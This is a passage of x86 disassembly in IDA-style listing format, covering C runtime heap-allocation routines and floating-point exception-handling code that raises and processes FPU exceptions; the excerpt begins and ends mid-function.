mov [ebp+var_4], edx
loc_41BCE6: ; CODE XREF: sub_41BB80+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_41BCE6
loc_41BD10: ; CODE XREF: sub_41BB80+15E�j
mov ds:off_435EB0, edi
lea eax, [edi+2018h]
loc_41BD1C: ; CODE XREF: sub_41BB80+1A8�j
cmp ecx, eax
jnb short loc_41BD2C
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_41BD2A
add ecx, 8
jmp short loc_41BD1C
; ---------------------------------------------------------------------------
loc_41BD2A: ; CODE XREF: sub_41BB80+1A3�j
cmp ecx, eax
loc_41BD2C: ; CODE XREF: sub_41BB80+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_41BD83
; ---------------------------------------------------------------------------
loc_41BD4F: ; CODE XREF: sub_41BB80+F2�j
call sub_41B888
test eax, eax
jz short loc_41BD81
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov ds:off_435EB0, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_41BD83
; ---------------------------------------------------------------------------
loc_41BD81: ; CODE XREF: sub_41BB80+143�j
; sub_41BB80+1D6�j
xor eax, eax
loc_41BD83: ; CODE XREF: sub_41BB80+D6�j
; sub_41BB80+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41BB80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD88 proc near ; CODE XREF: sub_41BB80+4A�p
; sub_41BB80+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_41BDCD
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_41BDBC
add [ecx], edx
sub [ecx+4], edx
jmp short loc_41BDC5
; ---------------------------------------------------------------------------
loc_41BDBC: ; CODE XREF: sub_41BD88+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41BDC5: ; CODE XREF: sub_41BD88+32�j
lea eax, [edi+8]
jmp loc_41BE9B
; ---------------------------------------------------------------------------
loc_41BDCD: ; CODE XREF: sub_41BD88+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_41BDD6
mov eax, esi
loc_41BDD6: ; CODE XREF: sub_41BD88+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_41BE20
loc_41BDDD: ; CODE XREF: sub_41BD88+96�j
mov bl, [eax]
test bl, bl
jnz short loc_41BE13
push 1
lea ebx, [eax+1]
pop esi
loc_41BDE9: ; CODE XREF: sub_41BD88+68�j
cmp byte ptr [ebx], 0
jnz short loc_41BDF2
inc ebx
inc esi
jmp short loc_41BDE9
; ---------------------------------------------------------------------------
loc_41BDF2: ; CODE XREF: sub_41BD88+64�j
cmp esi, edx
jnb short loc_41BE44
cmp eax, [ebp+var_4]
jnz short loc_41BE00
mov [ecx+4], esi
jmp short loc_41BE0C
; ---------------------------------------------------------------------------
loc_41BE00: ; CODE XREF: sub_41BD88+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_41BEA5
loc_41BE0C: ; CODE XREF: sub_41BD88+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41BE18
; ---------------------------------------------------------------------------
loc_41BE13: ; CODE XREF: sub_41BD88+59�j
movzx esi, bl
add eax, esi
loc_41BE18: ; CODE XREF: sub_41BD88+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_41BDDD
loc_41BE20: ; CODE XREF: sub_41BD88+53�j
lea esi, [ecx+8]
loc_41BE23: ; CODE XREF: sub_41BD88+EB�j
; sub_41BD88+F2�j
cmp esi, edi
jnb short loc_41BEA5
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_41BEA5
mov al, [esi]
test al, al
jnz short loc_41BE75
push 1
lea ebx, [esi+1]
pop eax
loc_41BE3B: ; CODE XREF: sub_41BD88+BA�j
cmp byte ptr [ebx], 0
jnz short loc_41BE65
inc ebx
inc eax
jmp short loc_41BE3B
; ---------------------------------------------------------------------------
loc_41BE44: ; CODE XREF: sub_41BD88+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41BE55
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_41BE5E
; ---------------------------------------------------------------------------
loc_41BE55: ; CODE XREF: sub_41BD88+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_41BE5E: ; CODE XREF: sub_41BD88+CB�j
mov [eax], dl
add eax, 8
jmp short loc_41BE9B
; ---------------------------------------------------------------------------
loc_41BE65: ; CODE XREF: sub_41BD88+B6�j
cmp eax, edx
jnb short loc_41BE7C
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_41BEA5
mov esi, ebx
jmp short loc_41BE23
; ---------------------------------------------------------------------------
loc_41BE75: ; CODE XREF: sub_41BD88+AB�j
movzx eax, al
add esi, eax
jmp short loc_41BE23
; ---------------------------------------------------------------------------
loc_41BE7C: ; CODE XREF: sub_41BD88+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41BE8D
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_41BE96
; ---------------------------------------------------------------------------
loc_41BE8D: ; CODE XREF: sub_41BD88+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41BE96: ; CODE XREF: sub_41BD88+103�j
mov [esi], dl
lea eax, [esi+8]
loc_41BE9B: ; CODE XREF: sub_41BD88+40�j
; sub_41BD88+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_41BEA7
; ---------------------------------------------------------------------------
loc_41BEA5: ; CODE XREF: sub_41BD88+7E�j
; sub_41BD88+9D�j ...
xor eax, eax
loc_41BEA7: ; CODE XREF: sub_41BD88+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BD88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BEAC proc near ; CODE XREF: sub_41944F+19A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_41BEE6
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_41BF46
; ---------------------------------------------------------------------------
loc_41BEE6: ; CODE XREF: sub_41BEAC+26�j
jnb short loc_41BF4D
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_41BF4D
lea eax, [ecx+edx]
loc_41BEFB: ; CODE XREF: sub_41BEAC+59�j
cmp eax, esi
jnb short loc_41BF09
cmp byte ptr [eax], 0
jnz short loc_41BF07
inc eax
jmp short loc_41BEFB
; ---------------------------------------------------------------------------
loc_41BF07: ; CODE XREF: sub_41BEAC+56�j
cmp eax, esi
loc_41BF09: ; CODE XREF: sub_41BEAC+51�j
jnz short loc_41BF4D
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_41BF41
cmp esi, eax
jbe short loc_41BF41
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_41BF38
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_41BF33
loc_41BF2C: ; CODE XREF: sub_41BEAC+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_41BF2C
loc_41BF33: ; CODE XREF: sub_41BEAC+7E�j
mov [ebx+4], eax
jmp short loc_41BF41
; ---------------------------------------------------------------------------
loc_41BF38: ; CODE XREF: sub_41BEAC+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_41BF41: ; CODE XREF: sub_41BEAC+68�j
; sub_41BEAC+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_41BF46: ; CODE XREF: sub_41BEAC+38�j
mov [ebp+var_4], 1
loc_41BF4D: ; CODE XREF: sub_41BEAC:loc_41BEE6�j
; sub_41BEAC+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41BEAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_41BF55(int,int,double,int)
sub_41BF55 proc near ; CODE XREF: sub_417CA4+51�p
; sub_417DEB+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:dword_436608, 0
jnz short loc_41BF8A
push [ebp+arg_C] ; int
fld qword ptr [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld qword ptr [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_41C50A
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41BF8A: ; CODE XREF: sub_41BF55+A�j
push 0FFFFh
mov ds:dword_4CD9B4, 21h
push [ebp+arg_C]
call sub_41C77D
fld qword ptr [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_41BF55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41BFA8(int,int,double,double,int)
sub_41BFA8 proc near ; CODE XREF: sub_417CA4:loc_417D67�p
; sub_417DEB:loc_417EAE�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_41C2F3
add esp, 0Ch
test eax, eax
jnz short loc_41BFE6
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_41C040
add esp, 18h
loc_41BFE6: ; CODE XREF: sub_41BFA8+1A�j
push [ebp+arg_0]
call sub_41C5DD
cmp ds:dword_436608, 0
pop ecx
jnz short loc_41C024
test eax, eax
jz short loc_41C024
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_41C50A
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_41C024: ; CODE XREF: sub_41BFA8+4E�j
; sub_41BFA8+52�j
push eax
call sub_41C592
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_41C77D
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_41BFA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C040 proc near ; CODE XREF: sub_41BFA8+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_41C072
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_41C072: ; CODE XREF: sub_41C040+23�j
test cl, 2
jz short loc_41C085
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_41C085: ; CODE XREF: sub_41C040+35�j
test cl, bl
jz short loc_41C097
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_41C097: ; CODE XREF: sub_41C040+47�j
test cl, 4
jz short loc_41C0AA
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_41C0AA: ; CODE XREF: sub_41C040+5A�j
test cl, 8
jz short loc_41C0BD
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_41C0BD: ; CODE XREF: sub_41C040+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_41C760
test al, bl
jz short loc_41C146
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_41C146: ; CODE XREF: sub_41C040+FD�j
test al, 4
jz short loc_41C151
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_41C151: ; CODE XREF: sub_41C040+108�j
test al, 8
jz short loc_41C15C
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_41C15C: ; CODE XREF: sub_41C040+113�j
test al, 10h
jz short loc_41C166
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_41C166: ; CODE XREF: sub_41C040+11E�j
test al, 20h
jz short loc_41C170
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_41C170: ; CODE XREF: sub_41C040+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_41C1AF
cmp eax, 400h
jz short loc_41C1A1
cmp eax, 800h
jz short loc_41C195
cmp eax, ecx
jnz short loc_41C1B5
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_41C1B5
; ---------------------------------------------------------------------------
loc_41C195: ; CODE XREF: sub_41C040+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_41C1AB
; ---------------------------------------------------------------------------
loc_41C1A1: ; CODE XREF: sub_41C040+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_41C1AB: ; CODE XREF: sub_41C040+15F�j
mov [eax], ecx
jmp short loc_41C1B5
; ---------------------------------------------------------------------------
loc_41C1AF: ; CODE XREF: sub_41C040+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_41C1B5: ; CODE XREF: sub_41C040+14B�j
; sub_41C040+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_41C1E0
cmp eax, 200h
jz short loc_41C1D3
cmp eax, ecx
jnz short loc_41C1ED
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_41C1ED
; ---------------------------------------------------------------------------
loc_41C1D3: ; CODE XREF: sub_41C040+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_41C1EB
; ---------------------------------------------------------------------------
loc_41C1E0: ; CODE XREF: sub_41C040+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_41C1EB: ; CODE XREF: sub_41C040+19E�j
mov [eax], ecx
loc_41C1ED: ; CODE XREF: sub_41C040+189�j
; sub_41C040+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_41C76E
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_4241BC ;; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_41C267
and dword ptr [esi], 0FFFFFFFEh
loc_41C267: ; CODE XREF: sub_41C040+222�j
test byte ptr [eax+8], 8
jz short loc_41C270
and dword ptr [esi], 0FFFFFFFBh
loc_41C270: ; CODE XREF: sub_41C040+22B�j
test byte ptr [eax+8], 4
jz short loc_41C279
and dword ptr [esi], 0FFFFFFF7h
loc_41C279: ; CODE XREF: sub_41C040+234�j
test byte ptr [eax+8], 2
jz short loc_41C282
and dword ptr [esi], 0FFFFFFEFh
loc_41C282: ; CODE XREF: sub_41C040+23D�j
test [eax+8], bl
jz short loc_41C28A
and dword ptr [esi], 0FFFFFFDFh
loc_41C28A: ; CODE XREF: sub_41C040+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_41C2BE
dec ecx
jz short loc_41C2B2
dec ecx
jz short loc_41C2A8
dec ecx
jnz short loc_41C2C0
or byte ptr [esi+1], 0Ch
jmp short loc_41C2C0
; ---------------------------------------------------------------------------
loc_41C2A8: ; CODE XREF: sub_41C040+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_41C2BA
; ---------------------------------------------------------------------------
loc_41C2B2: ; CODE XREF: sub_41C040+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_41C2BA: ; CODE XREF: sub_41C040+270�j
mov [esi], ecx
jmp short loc_41C2C0
; ---------------------------------------------------------------------------
loc_41C2BE: ; CODE XREF: sub_41C040+257�j
and [esi], edx
loc_41C2C0: ; CODE XREF: sub_41C040+260�j
; sub_41C040+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_41C2E0
dec ecx
jz short loc_41C2D7
dec ecx
jnz short loc_41C2E9
and [esi], edx
jmp short loc_41C2E9
; ---------------------------------------------------------------------------
loc_41C2D7: ; CODE XREF: sub_41C040+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_41C2E7
; ---------------------------------------------------------------------------
loc_41C2E0: ; CODE XREF: sub_41C040+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_41C2E7: ; CODE XREF: sub_41C040+29E�j
mov [esi], ecx
loc_41C2E9: ; CODE XREF: sub_41C040+291�j
; sub_41C040+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41C040 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C2F3 proc near ; CODE XREF: sub_41BFA8+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_41C31E
test byte ptr [ebp+arg_8], bl
jz short loc_41C31E
push ebx
call sub_41C7A0
pop ecx
and edi, 0FFFFFFF7h
jmp loc_41C4E8
; ---------------------------------------------------------------------------
loc_41C31E: ; CODE XREF: sub_41C2F3+15�j
; sub_41C2F3+1A�j
test al, 4
jz short loc_41C338
test byte ptr [ebp+arg_8], 4
jz short loc_41C338
push 4
call sub_41C7A0
pop ecx
and edi, 0FFFFFFFBh
jmp loc_41C4E8
; ---------------------------------------------------------------------------
loc_41C338: ; CODE XREF: sub_41C2F3+2D�j
; sub_41C2F3+33�j
test al, bl
jz loc_41C412
test byte ptr [ebp+arg_8], 8
jz loc_41C412
push 8
call sub_41C7A0
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_41C3EA
cmp ecx, 400h
jz short loc_41C3C2
cmp ecx, 800h
jz short loc_41C39A
cmp ecx, eax
jnz loc_41C40A
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_424818
fld ds:dbl_435FA0
fnstsw ax
sahf
ja short loc_41C392
fchs
loc_41C392: ; CODE XREF: sub_41C2F3+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41C408
; ---------------------------------------------------------------------------
loc_41C39A: ; CODE XREF: sub_41C2F3+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_424818
fnstsw ax
sahf
jbe short loc_41C3B2
fld ds:dbl_435F90
jmp short loc_41C3BA
; ---------------------------------------------------------------------------
loc_41C3B2: ; CODE XREF: sub_41C2F3+B5�j
fld ds:dbl_435FA0
fchs
loc_41C3BA: ; CODE XREF: sub_41C2F3+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41C408
; ---------------------------------------------------------------------------
loc_41C3C2: ; CODE XREF: sub_41C2F3+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_424818
fnstsw ax
sahf
jbe short loc_41C3DA
fld ds:dbl_435FA0
jmp short loc_41C3E2
; ---------------------------------------------------------------------------
loc_41C3DA: ; CODE XREF: sub_41C2F3+DD�j
fld ds:dbl_435F90
fchs
loc_41C3E2: ; CODE XREF: sub_41C2F3+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41C408
; ---------------------------------------------------------------------------
loc_41C3EA: ; CODE XREF: sub_41C2F3+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_424818
fld ds:dbl_435F90
fnstsw ax
sahf
ja short loc_41C402
fchs
loc_41C402: ; CODE XREF: sub_41C2F3+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_41C408: ; CODE XREF: sub_41C2F3+A5�j
; sub_41C2F3+CD�j ...
fstp qword ptr [ecx]
loc_41C40A: ; CODE XREF: sub_41C2F3+81�j
and edi, 0FFFFFFFEh
jmp loc_41C4E8
; ---------------------------------------------------------------------------
loc_41C412: ; CODE XREF: sub_41C2F3+47�j
; sub_41C2F3+51�j
test al, 2
jz loc_41C4E8
test byte ptr [ebp+arg_8], 10h
jz loc_41C4E8
push esi
xor esi, esi
test al, 10h
jz short loc_41C42D
mov esi, ebx
loc_41C42D: ; CODE XREF: sub_41C2F3+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp ds:dbl_424818
fnstsw ax
sahf
jz loc_41C4D6
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_41C69F
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_41C478
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_41C4CC
; ---------------------------------------------------------------------------
loc_41C478: ; CODE XREF: sub_41C2F3+17A�j
fld [ebp+var_C]
fcomp ds:dbl_424818
fnstsw ax
sahf
jnb short loc_41C48A
mov edx, ebx
jmp short loc_41C48C
; ---------------------------------------------------------------------------
loc_41C48A: ; CODE XREF: sub_41C2F3+191�j
xor edx, edx
loc_41C48C: ; CODE XREF: sub_41C2F3+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_41C4C0
sub eax, ecx
loc_41C4A3: ; CODE XREF: sub_41C2F3+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_41C4AE
test esi, esi
jnz short loc_41C4AE
mov esi, ebx
loc_41C4AE: ; CODE XREF: sub_41C2F3+1B3�j
; sub_41C2F3+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_41C4BA
or byte ptr [ebp+var_C+3], 80h
loc_41C4BA: ; CODE XREF: sub_41C2F3+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_41C4A3
loc_41C4C0: ; CODE XREF: sub_41C2F3+1AC�j
test edx, edx
jz short loc_41C4CC
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_41C4CC: ; CODE XREF: sub_41C2F3+183�j
; sub_41C2F3+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_41C4D8
; ---------------------------------------------------------------------------
loc_41C4D6: ; CODE XREF: sub_41C2F3+14E�j
mov esi, ebx
loc_41C4D8: ; CODE XREF: sub_41C2F3+1E1�j
test esi, esi
pop esi
jz short loc_41C4E5
push 10h
call sub_41C7A0
pop ecx
loc_41C4E5: ; CODE XREF: sub_41C2F3+1E8�j
and edi, 0FFFFFFFDh
loc_41C4E8: ; CODE XREF: sub_41C2F3+26�j
; sub_41C2F3+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_41C4FF
test byte ptr [ebp+arg_8], 20h
jz short loc_41C4FF
push 20h
call sub_41C7A0
pop ecx
and edi, 0FFFFFFEFh
loc_41C4FF: ; CODE XREF: sub_41C2F3+1F9�j
; sub_41C2F3+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_41C2F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C50A(int,int,int,int,int,int,double,int)
sub_41C50A proc near ; CODE XREF: sub_41BF55+2B�p
; sub_41BFA8+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_41C5B8
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_41C575
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_41C77D
lea eax, [ebp+var_20]
push eax
call sub_42017F
add esp, 0Ch
test eax, eax
jnz short loc_41C56F
push esi
call sub_41C592
pop ecx
loc_41C56F: ; CODE XREF: sub_41C50A+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41C575: ; CODE XREF: sub_41C50A+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_41C77D
push [ebp+arg_0]
